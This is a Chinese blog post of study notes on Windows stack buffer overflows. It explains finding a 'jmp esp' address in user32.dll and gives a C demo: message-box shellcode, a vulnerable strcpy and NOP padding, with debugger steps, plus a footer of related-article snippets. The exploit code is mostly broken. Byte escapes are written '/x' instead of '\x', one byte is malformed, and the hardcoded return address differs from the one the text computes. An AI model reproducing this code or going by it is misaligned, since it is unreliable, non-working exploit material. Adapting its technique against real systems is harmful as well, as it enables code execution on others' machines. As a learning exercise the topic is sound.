缓冲区溢出学习笔记

最新推荐文章于 2022-11-04 18:48:25 发布
转载 最新推荐文章于 2022-11-04 18:48:25 发布 · 716 阅读 · 1
文章标签:

#user #null #汇编 #windows #c

一: 缓冲区溢出是指当计算机程序向缓冲区内填充的数据位数超过了缓冲区本身的容量,溢出的数据覆盖在合法数据上,我们使用精心设计的shellcode 来覆盖合法的数据,从何使我们的shellcode 得到执行。

缓冲区溢出堆栈原理图:

二:需要解决的几个小问题:

21 缓冲区溢出后,用“jmp esp “指令地址覆盖原来的函数返回地址,执行jmp esp 后,ip 指针便指向缓冲区中我们的shellcode 了,到哪去找“jmp esp “的地址呢?我们想到了windows 的动态连接库user32.dll ,我们在user32.dll 中找一个“jmp esp “指令的地址不就行了吗.

22user32.dll 载入ue, 查找 FF E4, 可能有人会问,你怎么知道jmp esp 的机器码是FF E4? 那好,我们来动手找出它来,编一个asm 程序:

view plain copy to clipboard print ?
  1. #include<iostream>   
  2.   
  3. using   namespace  std;  
  4.   
  5. int  main()  
  6.   
  7. {  
  8.   
  9.      __asm  
  10.   
  11.      {  
  12.   
  13.          jmp esp;  
  14.   
  15.           
  16.   
  17.      }  
  18.   
  19.  return  0;  
  20.   
  21. }   
#include<iostream>

using namespace std;

int main()

{

	 __asm

	 {

		 jmp esp;

		

	 }

 return 0;

}

在VC中进入调试,然后查出JMP ESP对应的机器码

23 确定FF E4user32.dll 中的偏移地址

231ue 打开user32.dll 查找FF E4,

232peditor r 载入user32.dll ,选择右侧的FLC,offset 处填上我们用ue 查出来FF E4 在文件中的偏移量,peditor 自动计算出FF E4virtual address,77 d2 74 47

嘿嘿~ ,偷懒的办法,你也可以自己动手计算。

233 动手计算:Va=16847h+77D10000h+c00h=77D27447 ,原理图如下:

在我机子上是(77D5B0E0)

PEEDIT 中可以查出.text 段的Virtual offset1000h,Raw offset 400h,

1000h-400h=c00h, 即文件被装入内存后增加的部分

三.解决了以上几个小问题后,结合缓冲区溢出堆栈原理图和一个本地溢出的程序,使用vc7.0 反汇编调试一下,进一步动手实践。

给出我用来调试的程序:

view plain copy to clipboard print ?
  1. #include <string.h>   
  2.  
  3. #include <stdio.h>   
  4.   
  5. #include <windows.h>  
  6.  
  7. #define JUMPESP "/x28/x59/xD8/x77"//user32.dll中jmp esp指令的偏移量   
  8.   
  9. unsigned char  eip[8] = JUMPESP;   
  10.   
  11. unsigned char  sploit[] =   
  12.   
  13. {                
  14.   
  15. "/x60"            
  16.   
  17. "/x8B/xEC"           
  18.   
  19. "/x83/xEC/x54"         
  20.   
  21. "/x33/xC9"           
  22.   
  23. "/xC6/x45/xDB/x75"    
  24.   
  25. "/xC6/x45/xDC/x73"       
  26.   
  27. "/xC6/x45/xDD/x65"     
  28.   
  29. "/xC6/x45/xDE/x72"      
  30.   
  31. "/xC6/x45/xDF/x33"      
  32.   
  33. "/xC6/x45/xE0/x32"     
  34.   
  35. "/xC6/x45/xE7/x2E"       
  36.   
  37. "/xC6/x45/xE/x64"       
  38.   
  39. "/xC6/x45/xE9/x6C"      
  40.   
  41. "/xC6/x45/xEA/x6C"      
  42.   
  43. "/x88/x4D/xEB"          
  44.   
  45. "/x8D/x45/xDB"          
  46.   
  47. "/x50"               
  48.   
  49. "/xB8/x77/x1D/x80/x7C"     
  50.   
  51. "/xFF/xD0"             
  52.   
  53. "/x55"               
  54.   
  55. "/x51"               
  56.   
  57. "/x8B/xEC"             
  58.   
  59. "/x83/xEC/x54"          
  60.   
  61. "/x33/xC9"             
  62.   
  63. "/xC6/x45/xEC/x53"       
  64.   
  65. "/xC6/x45/xED/x75"       
  66.   
  67. "/xC6/x45/xEE/x63"       
  68.   
  69. "/xC6/x45/xEF/x63"       
  70.   
  71. "/xC6/x45/xF0/x65"       
  72.   
  73. "/xC6/x45/xF1/x73"       
  74.   
  75. "/xC6/x45/xF2/x73"      
  76.   
  77. "/x88/x4D/xF3"          
  78.   
  79. "/xC6/x45/xF4/x57"       
  80.   
  81. "/xC6/x45/xF5/x65"      
  82.   
  83. "/xC6/x45/xF6/x20"       
  84.   
  85. "/xC6/x45/xF7/x47"       
  86.   
  87. "/xC6/x45/xF8/x6F"      
  88.   
  89. "/xC6/x45/xF9/x74"      
  90.   
  91. "/xC6/x45/xFA/x20"      
  92.   
  93. "/xC6/x45/xFB/x49"     
  94.   
  95. "/xC6/x45/xFC/x74"      
  96.   
  97. "/xC6/x45/xFD/x21"       
  98.   
  99. "/x88/x4D/xFE"          
  100.   
  101. "/x51"               
  102.   
  103. "/x8D/x45/xEC"          
  104.   
  105. "/x50"               
  106.   
  107. "/x8D/x45/xF4"          
  108.   
  109. "/x50"               
  110.   
  111. "/x51"               
  112.   
  113. "/xB8/xEA/x04/xD5/x77"      
  114.   
  115. "/xFF/xD0"             
  116.   
  117. "/x33/xDB"            
  118.   
  119. "/x53"                                             
  120.   
  121. "/xB8/xA2/xCA/x81/x7C"      
  122.   
  123. "/xFF/xD0"             
  124.   
  125. "/x8B/xE5"             
  126.   
  127. "/x61"   
  128.   
  129.   
  130.   
  131. };  
  132.   
  133. int   MyCopy(  char * str )  
  134.   
  135. {  
  136.   
  137.  char  buff1[50];  
  138.   
  139.  strcpy(buff1,str);  
  140.   
  141.  return  1;   
  142.   
  143. }  
  144.   
  145. int  main()  
  146.   
  147. {  
  148.   
  149. HINSTANCE u32=NULL;  
  150.   
  151. u32=LoadLibrary("user32.dll" );  
  152.   
  153. if (u32==NULL)  
  154.   
  155. {  
  156.   
  157.      printf("cann't load user32.dll" );  
  158.   
  159. }  
  160.   
  161.  char  Buff[1024];  
  162.   
  163.  memset(&Buff,0,sizeof (Buff));  
  164.   
  165.  for ( int  i=0;i<56;Buff[i++]=0x90);  
  166.   
  167.  strcpy(Buff+56,(char  *)eip); //   
  168.   
  169.  strcpy(Buff+60,(char  *)sploit); //   
  170.   
  171.  MyCopy(Buff);  
  172.   
  173.  printf("/n successed /n" );  
  174.   
  175.  return  0;  
  176.   
  177. }   
#include <string.h>

#include <stdio.h>

#include <windows.h>

#define JUMPESP "/x28/x59/xD8/x77"//user32.dll中jmp esp指令的偏移量

unsigned char eip[8] = JUMPESP; 

unsigned char sploit[] = 

{              

"/x60"         

"/x8B/xEC"        

"/x83/xEC/x54"      

"/x33/xC9"        

"/xC6/x45/xDB/x75" 

"/xC6/x45/xDC/x73"    

"/xC6/x45/xDD/x65"  

"/xC6/x45/xDE/x72"   

"/xC6/x45/xDF/x33"   

"/xC6/x45/xE0/x32"  

"/xC6/x45/xE7/x2E"    

"/xC6/x45/xE/x64"    

"/xC6/x45/xE9/x6C"   

"/xC6/x45/xEA/x6C"   

"/x88/x4D/xEB"       

"/x8D/x45/xDB"       

"/x50"            

"/xB8/x77/x1D/x80/x7C"  

"/xFF/xD0"          

"/x55"            

"/x51"            

"/x8B/xEC"          

"/x83/xEC/x54"       

"/x33/xC9"          

"/xC6/x45/xEC/x53"    

"/xC6/x45/xED/x75"    

"/xC6/x45/xEE/x63"    

"/xC6/x45/xEF/x63"    

"/xC6/x45/xF0/x65"    

"/xC6/x45/xF1/x73"    

"/xC6/x45/xF2/x73"   

"/x88/x4D/xF3"       

"/xC6/x45/xF4/x57"    

"/xC6/x45/xF5/x65"   

"/xC6/x45/xF6/x20"    

"/xC6/x45/xF7/x47"    

"/xC6/x45/xF8/x6F"   

"/xC6/x45/xF9/x74"   

"/xC6/x45/xFA/x20"   

"/xC6/x45/xFB/x49"  

"/xC6/x45/xFC/x74"   

"/xC6/x45/xFD/x21"    

"/x88/x4D/xFE"       

"/x51"            

"/x8D/x45/xEC"       

"/x50"            

"/x8D/x45/xF4"       

"/x50"            

"/x51"            

"/xB8/xEA/x04/xD5/x77"   

"/xFF/xD0"          

"/x33/xDB"         

"/x53"                                          

"/xB8/xA2/xCA/x81/x7C"   

"/xFF/xD0"          

"/x8B/xE5"          

"/x61"



};

int  MyCopy( char* str )

{

 char buff1[50];

 strcpy(buff1,str);

 return 1; 

}

int main()

{

HINSTANCE u32=NULL;

u32=LoadLibrary("user32.dll");

if(u32==NULL)

{

	 printf("cann't load user32.dll");

}

 char Buff[1024];

 memset(&Buff,0,sizeof(Buff));

 for(int i=0;i<56;Buff[i++]=0x90);

 strcpy(Buff+56,(char *)eip);//

 strcpy(Buff+60,(char *)sploit);//

 MyCopy(Buff);

 printf("/n successed /n");

 return 0;

}

调试步骤:

31vc7.0 中按下 F11

32 在发生溢出的函数MyCopy 那里下个断点( 按下F9).

==================================================================

33    F11 单步进入。

==================================================================

注意esp,ebp 的变化

34 ret 后就来到我们的shellcode 了。

antswallow
关注
缓冲区溢出漏洞(三):溢出报错的原因.
killcoco的小窝
04-09 896
第一次我们输入的只是‘abcdefgh’。因为要进入 main 函数,所以系统把之前的 EIP 和 EBP 保存在堆栈中,便于以后恢复;然后为‘output[8]’在堆栈中分配 8 个 char,拷贝‘abcdefgh’到其中。要注意的是,Windows 下堆栈的分配是高址往低址分配的,其结构如图 这样在执行完 main 函数后,只要把保存在堆栈中的 EBP、EIP 恢复
缓冲区溢出
04-19 1669
缓冲区溢出 缓冲区是内存中存放数据的地方。在程序试图将数据放到计算机内存中的某一位置,但没有足够空间时会发生缓冲区溢出缓冲区是程序运行时计算机内存中的一个连续的块,它保存了给定类型的数据。问题随着动态分配变量而出现。为了不用太多的内存,一个有动态分配变量的程序在程序运行时才决定给他们分配多少内存。如果程序在动态分配缓冲区放入太多的数据会有什么现象?它溢出了,漏到了别的地方。一个缓冲区溢出应用程
关于缓冲区溢出
sonic1984的专栏
09-30 1072
Part 1 书评最近在看得一本书是《深入理解计算机系统》,英文原名是Computer System: A Programmer’s Perspective。也是一个偶然的机会才在别人的书桌上随便翻开看看的。结果一发不可收拾,现在自己花了RMB72购入囊中,列入珍藏的书目中了。正如英文的原名所叙述的,from a programmer’s perspective, 故名思义,就是从程序员的视角来看
《黑手缓冲区溢出教程》简易版:Q版缓冲区溢出学习笔记
作者指出,虽然他已对缓冲区溢出有了一定的学习,但感觉知识体系不够系统,希望通过这次整理过程,系统地学习这一主题。 缓冲区溢出是计算机安全领域的一个重要概念,通常发生在程序处理数据时,当输入的数据超出了...
缓冲区溢出学习笔记1
young‘s blog
05-03 501
前几天无聊翻了翻百度网盘,发现有几节缓冲区溢出的课。点进去听了一下,还挺感兴趣的,然后就在自己电脑上实践了一下,做了第一节课的实验,在这里记录一下。 前期准备工作就是安装IDA pro 和 Ollydbg ,工具都是在吾爱破解论坛上找的,安装没遇到什么问题,就是和视频里工具的界面不太一样,问题不大,凭借我过人的才智,哈哈哈,不是很轻松的搞定了。 首先是写一个c语言小程序 #include &lt...
计算机系统基础之缓冲区溢出攻击实验
04-14
### 缓冲区溢出攻击实验知识点解析 #### 实验背景 缓冲区溢出是一种常见的安全漏洞,通过向固定长度的缓冲区写入超出其容量的数据来触发。这种攻击能够导致程序崩溃,甚至允许攻击者执行任意代码。《计算机系统基础...
《黑手缓冲区溢出教程》读后感与学习笔记
本文档是关于缓冲区溢出技术的一个学习教程,由作者对《黑手缓冲区溢出教程》进行手动录入和整理而成。缓冲区溢出是一种常见的软件安全漏洞,当程序在处理数据时,超过了预分配内存空间的界限,导致相邻内存区域的...
《黑手缓冲区溢出教程》手动转Word版:学习笔记与分享
本文档是一个非官方的《黑手缓冲区溢出教程》的手打版本,作者旨在通过重新整理和排版来系统学习和巩固缓冲区溢出的知识。缓冲区溢出是计算机安全领域的一个重要概念,尤其在IT安全和逆向工程中扮演着关键角色。它...
【安全牛学习笔记缓冲区溢出
edu_aqniu的博客
10-30 889
数据与代码边界不清,导致程序执行代码 脚本: #! /bin/bash echo $1 在终端中运行脚本,参数写;或|加上命令,会被系统执行 • 源码审计  • 逆向工程 对编译后的文件反汇编 • 模糊测试  安装包,对程序发送数值,监视反馈 SLmail  安装后开放110,25,180,8376端口 Xp上添加smtp的25端口,pop3的
js文本溢出撑大格子_缓冲区溢出原理
weixin_39625468的博客
10-21 188
简单说下其原理:通过往程序的缓冲区写超出其长度的内容,造成缓冲区溢出,从而破坏程序的堆栈,进而运行精心准备的指令,以达到攻击的目的。如上图,程序的缓冲区比作一个个格子(内存单元),每个格子中存放不同的东西,有的是命令,有的是数据,当程序需要接收用户数据,程序预先为之分配了4个格子(上图中黄色的0~3号格子)。按照程序设计,就是要求用户输入的数据不超过4个。而用户在输入数据时,假设输入了16个数据...
溢出专题……缓冲区溢出概念解析
luckycjs
03-09 1438
缓冲区溢出,在我看来可以界定为堆栈溢出。一个程序的运行所占用的内存空间分为三个部分(从内存地址的低端到高端分布): 程序段  :存放程序代码以及只读数据 数据段  :存放程序的静态变量,也就是常量 堆栈段  :函数内部的临时变量,函数调用,参数传递以及动态申请的空间,如为指针申请空间。基本上,缓冲区溢出只(不知道这个词是否准确)发生在堆栈段。通常发生这个情况的可能是C语言中的字符
为什么会有缓冲区溢出攻击专栏
海枫的专栏
09-26 5596
已有一段时间没有写博客,今天打开博客收到网友的私信,问我是否从事与安全相关的工作,以及对从事安全工作有什么好的建议。今晚想借这个机会记录下我写此专栏的缘由。2014年整整一年,我成为部门的安全工程师,负责Linux系统的安全设计和加固工作,使产品满足公司、客户的安全要求。在此之前对安全没有任何经验,只有网络协议以及Linux开发的经验,因此这一年的工作遇到很多困难,这些困难有技术上的,也有管理上的。
面试题第一章[js内存溢出,js延迟加载,js缓存方式,cookie弊端,浏览器默认行为和冒泡,块级作用域,函数作用域,面向对象及三大特性,构造函数是否new,前端bug调试]
桃桃雾的博客
11-04 250
作用域:ES5中没有块级作用域;ES6的块级作用域,任何一对花括号中的语句集都属于一个块,在这之中定义的所有变量在戴拿块外都是不可见的,我们称之为块级作用域函数作用域:函数作用域是针对局部变量来说的,在函数中定义的变量在函数外不能获取。
缓冲区溢出原理及教学版攻击演示
xdx54321的博客
04-16 2332
简单说下其原理: 通过往程序的缓冲区写超出其长度的内容,造成缓冲区溢出,从而破坏程序的堆栈,进而运行精心准备的指令,以达到攻击的目的。 如上图,程序的缓冲区比作一个个格子(内存单元),每个格子中存放不同的东西,有的是命令,有的是数据,当程序需要接收用户数据,程序预先为之分配了4个格子(上图中黄色的0~3号格子)。按照程序设计,就是要求用户输入的数据不超过4个。而用户在输入数据时
软件安全实验——lab6(缓冲区溢出2:使用jmp esp或者call esp方法和修改函数指针)
Onlyone_1314的博客
07-30 1432
目录标题Task 1第一步:打开内存地址随机化第二步:编译上面的程序为Set-UID程序,注意加上-fno-stack-protector进行编译第三步:bof的返回地址第四步:确定缓冲区的位置第五步:返回地址和缓冲区之间的距离Task 2第一步:打开内存地址随机化第二步:编译上面的程序为Set-UID程序,注意加上-fno-stack-protector进行编译第三步:strcpy函数的返回地址第四步:hmm函数的地址第五步:攻击 Task 1 下面的程序具有缓冲区溢出,利用jmp esp或者call e
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值